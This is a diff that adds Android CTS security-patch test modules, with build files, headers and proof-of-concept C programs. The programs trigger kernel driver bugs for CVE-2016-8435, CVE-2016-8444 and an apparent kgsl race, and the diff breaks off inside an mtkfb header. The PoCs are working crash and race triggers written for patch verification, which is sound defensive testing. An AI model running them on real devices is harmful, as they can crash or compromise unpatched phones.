+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM 0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC 0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST 0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH 0x00000008
+#define KGSL_CONTEXT_PREAMBLE 0x00000010
+#define KGSL_CONTEXT_TRASH_STATE 0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS 0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS 0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME 0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC 0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT 0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+ unsigned int flags;
+ unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+ _IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+ unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+ _IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+ int type; /* Type of event (see list below) */
+ unsigned int timestamp; /* Timestamp to trigger event on */
+ unsigned int context_id; /* Context for the timestamp */
+ void __user *priv; /* Pointer to the event specific blob */
+ size_t len; /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+ _IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+ struct kgsl_drawctxt_create ctx;
+ ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+ printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+ g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+ struct kgsl_drawctxt_destroy ctx;
+ ctx.drawctxt_id = id;
+ ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+ //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+
+
+ //mprotect(event.priv, 0x1000, PROT_READ);
+
+ ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+ printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+ char* dev_path = "/dev/kgsl-3d0";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ close(4);
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(-19, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ trigger_kgsl_create_drawctx();
+
+ g_event.type = 2;
+ g_event.context_id = g_ctx_id;
+ g_event.len = 4;
+ g_event.priv = malloc(0x1000);
+ g_event.timestamp = 0;
+ mprotect(g_event.priv, 0x1000, PROT_READ);
+ //printf("[*] close fd errno = %d\n", errno);
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_kgsl_timestamp_event();
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+ __u32 id;
+ __u32 incrs;
+};
+
+struct list_head {
+ struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+ void* open_channel;
+ void* close_channel;
+ void* reset;
+ void* is_add_reg;
+ void* submit;
+};
+
+struct tegra_drm_client {
+ /* sizeof(host1x_client) is 232 */
+ unsigned char pad[232]; /* maybe gadget arguments */
+ struct list_head list;
+ struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+ struct tegra_drm_client *client;
+ void *channel;
+ struct list_head list;
+ /* FIXME we need pass lock op */
+ //struct mutex lock;
+ //bool keepon;
+ //struct host1x_user user;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
new file mode 100644
index 0000000..ff6acb0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/poc.c
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+
+#include "local_pwn.h"
+
+#define DEV "/dev/dri/renderD129"
+#define SYN_NUM 64
+
+struct drm_tegra_open_channel open_c = { 0 };
+struct drm_tegra_submit submit_c = { 0 };
+struct drm_tegra_syncpt syncpts[SYN_NUM] = { 0 };
+
+int main()
+{
+ int ret;
+ int dev_fd;
+ int i;
+
+ /* open dev */
+ dev_fd = open(DEV,O_RDONLY);
+ if(dev_fd == -1){
+ printf("[-] open dev failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare for ioctl */
+ open_c.client = HOST1X_CLASS_VIC;
+ submit_c.num_syncpts = SYN_NUM;
+ submit_c.syncpts = (__u64)syncpts;
+
+ for(i = 1; i < SYN_NUM; i++){
+ syncpts[i].id = 192;
+ syncpts[i].incrs = 0xffff;
+ }
+
+ /* open channel */
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == -1){
+ printf("[-] open_channel failed %d %s\n", errno, strerror(errno));
+ goto out_dev;
+ }
+ submit_c.context = open_c.context;
+ printf("[+] call submit\n");
+ ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ printf("[+] submit return %d\n", ret);
+
+out_dev:
+ close(dev_fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
new file mode 100644
index 0000000..50e2f6a
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8444
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
new file mode 100644
index 0000000..d681a43
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8444/poc.c
@@ -0,0 +1,78 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/syscall.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+
+#define MSM_SD_SHUTDOWN 0xc00856dd
+#define VIDIOC_MSM_ISPIF_CFG 0xc17056c0
+
+struct ispif_cfg_data {
+ int32_t cfg_type;
+ union {
+ int reg_dump; /* ISPIF_ENABLE_REG_DUMP */
+ uint32_t csid_version; /* ISPIF_INIT */
+ //struct msm_ispif_vfe_info vfe_info; /* ISPIF_SET_VFE_INFO */
+ //struct msm_ispif_param_data params; /* CFG, START, STOP */
+ };
+};
+
+long r[11];
+
+int fd;
+struct ispif_cfg_data data;
+
+void *worker_thread(void *arg) {
+
+ int arg1[3] = {0};
+ switch ((long)arg) {
+ case 0:
+ data.cfg_type = 8; ////release
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+ break;
+ case 1:
+ ioctl(fd, MSM_SD_SHUTDOWN, &arg1);
+ break;
+ }
+ return NULL;
+}
+
+int main() {
+
+ int pid,i;
+ pthread_t th[4];
+ fd = open( "/dev/v4l-subdev17", 0x0ul );
+
+ printf("please wait for several seconds...\n");
+
+ while(1){
+
+ data.cfg_type = 2; ////init
+ data.csid_version = 1;
+ ioctl(fd, VIDIOC_MSM_ISPIF_CFG, &data);
+
+ for (i = 0; i < 2; i++) {
+ pthread_create(&th[i], 0, worker_thread, (void *)(long)i);
+ usleep(10);
+ }
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
new file mode 100644
index 0000000..cd6049f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8448
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
new file mode 100644
index 0000000..b33073c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb.h
@@ -0,0 +1,397 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_H
+#define __MTKFB_H
+
+#include <linux/types.h>
+#include "mtkfb_info.h"
+
+
+/**NOTICE:
+ * Must be consistent with bionic/libc/kernel/linux/common/mtkfb.h
+ */
+#define MTK_FB_NO_ION_FD ((int)(~0U>>1))
+#define MTK_FB_NO_USE_LAEYR_ID ((int)(~0U>>1))
+#define FBCAPS_GENERIC_MASK (0x00000fff)
+#define FBCAPS_LCDC_MASK (0x00fff000)
+#define FBCAPS_PANEL_MASK (0xff000000)
+#define FBCAPS_MANUAL_UPDATE (0x00001000)
+#define FBCAPS_SET_BACKLIGHT (0x01000000)
+#define MTKFB_ERROR_IS_EARLY_SUSPEND (0x12000000)
+/* --------------------------------------------------------------------------- */
+/* IOCTL commands. */
+#define MTK_IOW(num, dtype) _IOW('O', num, dtype)
+#define MTK_IOR(num, dtype) _IOR('O', num, dtype)
+#define MTK_IOWR(num, dtype) _IOWR('O', num, dtype)
+#define MTK_IO(num) _IO('O', num)
+#define MTKFB_QUEUE_OVERLAY_CONFIG MTK_IOW(137, struct fb_overlay_config)
+/* -------------------------------------------------------------------------- */
+#define MTKFB_SET_OVERLAY_LAYER MTK_IOW(0, struct fb_overlay_layer)
+#define MTKFB_TRIG_OVERLAY_OUT MTK_IO(1)
+#define MTKFB_SET_VIDEO_LAYERS MTK_IOW(2, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_FRAMEBUFFER MTK_IOW(3, unsigned long)
+#define MTKFB_CONFIG_IMMEDIATE_UPDATE MTK_IOW(4, unsigned long)
+#define MTKFB_SET_MULTIPLE_LAYERS MTK_IOW(5, struct fb_overlay_layer)
+#define MTKFB_REGISTER_OVERLAYBUFFER MTK_IOW(6, struct fb_overlay_buffer_info)
+#define MTKFB_UNREGISTER_OVERLAYBUFFER MTK_IOW(7, unsigned int)
+#define MTKFB_SET_ORIENTATION MTK_IOW(8, unsigned long)
+#define MTKFB_FBLAYER_ENABLE MTK_IOW(9, unsigned int)
+#define MTKFB_LOCK_FRONT_BUFFER MTK_IO(10)
+#define MTKFB_UNLOCK_FRONT_BUFFER MTK_IO(11)
+#define MTKFB_POWERON MTK_IO(12)
+#define MTKFB_POWEROFF MTK_IO(13)
+
+/* Fence/Ion, OVL decoupling */
+#define MTKFB_PREPARE_OVERLAY_BUFFER MTK_IOW(14, struct fb_overlay_buffer)
+
+/* S3D control */
+#define MTKFB_SET_COMPOSING3D MTK_IOW(15, unsigned long)
+#define MTKFB_SET_S3D_FTM MTK_IOW(16, unsigned long)
+
+/* FM De-sense for EM and Normal mode */
+#define MTKFB_GET_DEFAULT_UPDATESPEED MTK_IOR(17, unsigned long)
+#define MTKFB_GET_CURR_UPDATESPEED MTK_IOR(18, unsigned long)
+/* for EM, not called change writecycle because DPI change pll ckl */
+#define MTKFB_CHANGE_UPDATESPEED MTK_IOW(19, unsigned long)
+#define MTKFB_GET_INTERFACE_TYPE MTK_IOR(20, unsigned long) /* /0 DBI, 1 DPI, 2 MIPI */
+#define MTKFB_GET_POWERSTATE MTK_IOR(21, unsigned long) /* /0: power off 1: power on */
+#define MTKFB_GET_DISPLAY_IF_INFORMATION MTK_IOR(22, mtk_dispif_info_t)
+/*called before SET_OVERLAY each time, if true, hwc will not use FB_LAYER again*/
+#define MTKFB_AEE_LAYER_EXIST MTK_IOR(23, unsigned long)
+#define MTKFB_GET_OVERLAY_LAYER_INFO MTK_IOR(24, struct fb_overlay_layer_info)
+#define MTKFB_FACTORY_AUTO_TEST MTK_IOR(25, unsigned long)
+#define MTKFB_GET_FRAMEBUFFER_MVA MTK_IOR(26, unsigned int)
+#define MTKFB_SLT_AUTO_CAPTURE MTK_IOWR(27, struct fb_slt_catpure)
+
+/*error handling*/
+#define MTKFB_META_RESTORE_SCREEN MTK_IOW(101, unsigned long)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT MTK_IO(103)
+#define MTKFB_ERROR_INDEX_UPDATE_TIMEOUT_AEE MTK_IO(104)
+
+/*restore bootlogo and character in meta mode*/
+#define MTKFB_META_SHOW_BOOTLOGO MTK_IO(105)
+
+/*Extension FB active option*/
+#define FB_ACTIVATE_NO_UPDATE 512 /* Skip frame update */
+/**
+ * Just for mt6589 Platform
+ * @{
+ */
+#define MTKFB_GETVFRAMEPHYSICAL MTK_IOW(41, unsigned long)
+#define MTKFB_WAIT_OVERLAY_READY MTK_IO(42)
+#define MTKFB_GET_OVERLAY_LAYER_COUNT MTK_IOR(43, unsigned long)
+#define MTKFB_GET_VIDEOLAYER_SIZE MTK_IOR(44, struct fb_overlay_layer)
+#define MTKFB_CAPTURE_VIDEOBUFFER MTK_IOW(45, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+/* Video Playback Mode */
+#define MTKFB_TV_POST_VIDEO_BUFFER MTK_IOW(46, unsigned long)
+#define MTKFB_TV_LEAVE_VIDEO_PLAYBACK_MODE MTK_IOW(47, unsigned long)
+/* For Factory Mode */
+#define MTKFB_IS_TV_CABLE_PLUG_IN MTK_IOW(48, unsigned long)
+
+/* -------------------------------------------------------------------------- */
+#define MTKFB_BOOTANIMATION MTK_IO(49)
+#define MTKFB_GETFPS MTK_IOW(50, unsigned long)
+#define MTKFB_VSYNC MTK_IO(51)
+
+/* ----------------------------------------------------------------------FM De-sense for EM and Normal mode */
+#define MTKFB_FM_NOTIFY_FREQ MTK_IOW(52, unsigned long) /* for Normal mode */
+#define MTKFB_RESET_UPDATESPEED MTK_IO(53)
+#define MTKFB_SET_UI_LAYER_ALPHA MTK_IOW(54, unsigned long)
+#define MTKFB_SET_UI_LAYER_SRCKEY MTK_IOW(55, unsigned long)
+
+#define MTKFB_GET_MAX_DISPLAY_COUNT MTK_IOR(56, unsigned int)
+#define MTKFB_SET_FB_LAYER_SECURE MTK_IOW(57, int)
+/**
+ * @}
+ */
+/* ---------------------------------------------------------------------- */
+
+/* -------------------------------------------------------------------------- */
+
+typedef enum {
+ MTK_FB_ORIENTATION_0 = 0,
+ MTK_FB_ORIENTATION_90 = 1,
+ MTK_FB_ORIENTATION_180 = 2,
+ MTK_FB_ORIENTATION_270 = 3,
+} MTK_FB_ORIENTATION;
+
+
+typedef enum {
+ MTK_FB_TV_SYSTEM_NTSC = 0,
+ MTK_FB_TV_SYSTEM_PAL = 1,
+} MTK_FB_TV_SYSTEM;
+
+
+typedef enum {
+ MTK_FB_TV_FMT_RGB565 = 0,
+ MTK_FB_TV_FMT_YUV420_SEQ = 1,
+ MTK_FB_TV_FMT_UYUV422 = 2,
+ MTK_FB_TV_FMT_YUV420_BLK = 3,
+} MTK_FB_TV_SRC_FORMAT;
+
+typedef enum {
+ LAYER_NORMAL_BUFFER = 0,
+ LAYER_SECURE_BUFFER = 1,
+ LAYER_PROTECTED_BUFFER = 2,
+ LAYER_SECURE_BUFFER_WITH_ALIGN = 0x10001, /* the higher 16 bits =1 for adding 64 bytes alignment */
+} MTK_FB_OVL_LAYER_SECURE_MODE;
+
+typedef struct _disp_dfo_item {
+ char name[32];
+ int value;
+} disp_dfo_item_t;
+
+/* -------------------------------------------------------------------------- */
+struct fb_slt_catpure {
+ MTK_FB_FORMAT format;
+
+ volatile char *outputBuffer;
+ unsigned int wdma_width;
+ unsigned int wdma_height;
+};
+
+struct fb_scale {
+ unsigned int xscale, yscale;
+};
+
+struct fb_frame_offset {
+ unsigned int idx;
+ unsigned long offset;
+};
+
+struct fb_update_window {
+ unsigned int x, y;
+ unsigned int width, height;
+};
+
+typedef enum {
+ LAYER_2D = 0,
+ LAYER_3D_SBS_0 = 0x1,
+ LAYER_3D_SBS_90 = 0x2,
+ LAYER_3D_SBS_180 = 0x3,
+ LAYER_3D_SBS_270 = 0x4,
+ LAYER_3D_TAB_0 = 0x10,
+ LAYER_3D_TAB_90 = 0x20,
+ LAYER_3D_TAB_180 = 0x30,
+ LAYER_3D_TAB_270 = 0x40,
+} MTK_FB_LAYER_TYPE;
+
+typedef enum {
+ DISP_DIRECT_LINK_MODE,
+ DISP_DECOUPLE_MODE
+} MTK_DISP_MODE;
+struct fb_overlay_mode {
+ MTK_DISP_MODE mode;
+};
+
+typedef enum { /* map sessions to scenairos in kernel driver */
+ DISP_SESSION_LCM = 1 << 0, /* DSI0 */
+ DISP_SESSION_MEM = 1 << 1, /* OVL0->WDMA0 */
+/* Extension mode, Dst buf is provided by user,for Wifi Display or other purpose */
+ DISP_SESSION_WFD = 1 << 2,
+ DISP_SESSION_MHL = 1 << 3, /* DPI */
+ DISP_SESSION_LCM1 = 1 << 4, /* DSI1 */
+ DISP_SESSION_MEM1 = 1 << 5, /* OVL1->WDMA1 */
+ /* TODO:can be extended with other Session Id */
+ SESSION_MASK = 0xff & ~(1 << 6)
+} MTK_DISP_SESSION;
+
+struct fb_overlay_session {
+ unsigned int session; /* one or more @MTK_DISP_SESSION combined */
+};
+
+struct fb_overlay_decouple {
+ MTK_DISP_MODE mode;
+ unsigned int session;
+};
+struct fb_overlay_buffer {
+ /* Input */
+ int layer_id;
+ unsigned int layer_en;
+ int ion_fd;
+ unsigned int cache_sync;
+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
